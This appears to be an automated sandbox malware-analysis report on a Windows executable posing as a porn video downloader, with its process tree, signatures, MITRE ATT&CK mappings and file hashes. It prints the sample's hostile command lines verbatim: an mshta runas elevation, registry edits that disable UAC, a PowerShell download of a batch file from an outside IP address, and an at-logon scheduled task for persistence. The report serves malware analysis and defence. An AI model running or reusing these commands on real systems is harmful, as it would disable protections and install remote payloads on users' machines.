Analysis
-
max time kernel
147s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2024 11:49
Static task
static1
Behavioral task
behavioral1
Sample
pornhub_downloader.1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
pornhub_downloader.1.exe
Resource
win10v2004-20240802-en
General
-
Target
pornhub_downloader.1.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 3280 powershell.exe -
pid Process 3280 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4728 attrib.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation pornhub_downloader.1.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation PORNHU~1.EXE -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2088 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pornhub_downloader.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PORNHU~1.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3384 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3280 powershell.exe 3280 powershell.exe 220 msedge.exe 220 msedge.exe 5116 msedge.exe 5116 msedge.exe 4684 identity_helper.exe 4684 identity_helper.exe 244 msedge.exe 244 msedge.exe 244 msedge.exe 244 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3280 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe 5116 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4104 wrote to memory of 3036 4104 pornhub_downloader.1.exe 82 PID 4104 wrote to memory of 3036 4104 pornhub_downloader.1.exe 82 PID 3036 wrote to memory of 2088 3036 cmd.exe 85 PID 3036 wrote to memory of 2088 3036 cmd.exe 85 PID 2088 wrote to memory of 4756 2088 mshta.exe 86 PID 2088 wrote to memory of 4756 2088 mshta.exe 86 PID 2088 wrote to memory of 4756 2088 mshta.exe 86 PID 4756 wrote to memory of 1404 4756 PORNHU~1.EXE 87 PID 4756 wrote to memory of 1404 4756 PORNHU~1.EXE 87 PID 1404 wrote to memory of 4936 1404 cmd.exe 89 PID 1404 wrote to memory of 4936 1404 cmd.exe 89 PID 1404 wrote to memory of 3636 1404 cmd.exe 90 PID 1404 wrote to memory of 3636 1404 cmd.exe 90 PID 1404 wrote to memory of 224 1404 cmd.exe 91 PID 1404 wrote to memory of 224 1404 cmd.exe 91 PID 1404 wrote to memory of 3124 1404 cmd.exe 92 PID 1404 wrote to memory of 3124 1404 cmd.exe 92 PID 3124 wrote to memory of 4292 3124 cmd.exe 93 PID 3124 wrote to memory of 4292 3124 cmd.exe 93 PID 1404 wrote to memory of 5116 1404 cmd.exe 94 PID 1404 wrote to memory of 5116 1404 cmd.exe 94 PID 1404 wrote to memory of 4728 1404 cmd.exe 95 PID 1404 wrote to memory of 4728 1404 cmd.exe 95 PID 5116 wrote to memory of 1244 5116 msedge.exe 96 PID 5116 wrote to memory of 1244 5116 msedge.exe 96 PID 1404 wrote to memory of 3280 1404 cmd.exe 97 PID 1404 wrote to memory of 3280 1404 cmd.exe 97 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 PID 5116 wrote to memory of 2112 5116 msedge.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4728 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.1.exe"C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F44.tmp\6F45.tmp\6F46.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.1.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7223.tmp\7224.tmp\7225.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"5⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:4936
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:3636
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵PID:4292
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfac546f8,0x7ffdfac54708,0x7ffdfac547187⤵PID:1244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:27⤵PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:87⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:17⤵PID:3688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:17⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:17⤵PID:3036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:87⤵PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:17⤵PID:3972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:17⤵PID:5092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:17⤵PID:4720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:17⤵PID:376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,16489981394170707105,1499161747854849128,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5496 /prefetch:27⤵
- Suspicious behavior: EnumeratesProcesses
PID:244
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:3384
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1380
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1112
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5e765f3d75e6b0e4a7119c8b14d47d8da
SHA1cc9f7c7826c2e1a129e7d98884926076c3714fc0
SHA256986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89
SHA512a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079
-
Filesize
152B
MD553bc70ecb115bdbabe67620c416fe9b3
SHA1af66ec51a13a59639eaf54d62ff3b4f092bb2fc1
SHA256b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771
SHA512cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize816B
MD5c29270c0e8b4bb5c22e32889515cd432
SHA15d202d7ee5ef7343f752ab4097dd3912ed9a7faa
SHA256f99391c43456b27070560af38e7ab1821d98ea894918351f70e9bdebc6e59489
SHA5128e9b8f881299c7c2656e526c18993737ebf10351151618df3940e70403cb37697d93b1a81bf42f710515c5bbe7e2e21b4401b3a8cbe6c7a6b4ff2e47786cf595
-
Filesize
1KB
MD50e4d957dbee2575385b82f2362778092
SHA16ee7509caaf67bf350d6e9ed28576eada816b275
SHA2567321934e0cdccb5ea0ef50d6c8712a5f9e38c9ffa6e96f09cbd10a94e1f4b792
SHA5125fac8caea429bfa9f6040f963f08ba1f2fa0912bbfd173006eba1136f63ef0aad76a7f489e0c8281df97551fbbe11bdfe4f6c5ef09f9a2073146898431b05f40
-
Filesize
5KB
MD5a01fa781834bf1afbd48580937a6e949
SHA1823d08c72162f790fbcf67ac47e66785bcfa5750
SHA256ad801193e96b7de66597b7dbb4e066c57d48f63a95ae849c3b5ca968582c267e
SHA512803d0a17c7640decf981e02c1e9caaa2e62854c1b60357e13f266aff6c76a9bbf515c93d18107d2480e9125a3ac06438a185d24479b8ad8dbdd13e3b23c2356e
-
Filesize
6KB
MD52e946d65dfb552cf790c36fae94be41c
SHA1e74d4f4d73ade6a5a5c024c4c0aac1e50116e66a
SHA25620a88162a002ce2e8b0f181f68799d8e1f249c3c366596cc97113c509a9a8963
SHA512bc663a3b8718d06ea1593b1142f4472b9e5f37d08fd93fa6fc6333aff73fb81993a15dd8d1d7baface3f32d91c6f591a3015e03aafc24d46aa8e4a013db4659a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize96B
MD52d671edc76929992057d15d1a81c6d9c
SHA112faa2cfa951c80b09e5ef0e46b9d8ebb5db50df
SHA256239e283197272dd48b23c971a11c9eade3b2a0a3b3e575b6f5364be11036b82b
SHA512187af029e5a0e87455b271d62794f927fa731de9b6b6b3fb194e4c57ab4e34f9041189cc5fdd412233341f78851e00a78c39c65b5a45f8233bc15f45cf1d8b65
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57ce0e.TMP
Filesize48B
MD54123c40eb2bbaa2626f743847df46e1b
SHA1293ba09ecc9ef54339258231863e9f7bb7535dee
SHA256208e7323c616d4fa6591f3f22eeb687202e15b9b906decf3790af241cf872603
SHA512cc848c11c296b91a0d478af429fd0f1814369ac25fb7b1a3d8602a750f7f1ca1aa9f4564dd4790d21ff0ca136bed977164e9b1ab6a8ff9ee87a5e18a6cb906b1
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD58df428f48a33dc8c58bf71f3a44f13c0
SHA16a5005536f80e755701c92b5f11bbe624606894c
SHA256ee5aca11fc1c376ec34f875c6ef627b21f9f4ae3498a1aecc10ebaa28c2ee0f4
SHA512747fc9d6eef9d825a88992e71116018f555df014c5b8002944a5caebafd446ad9df768a39428c275f4dacc1f675d919413e73ffee215fe8a9663d18fefc7d4cd
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82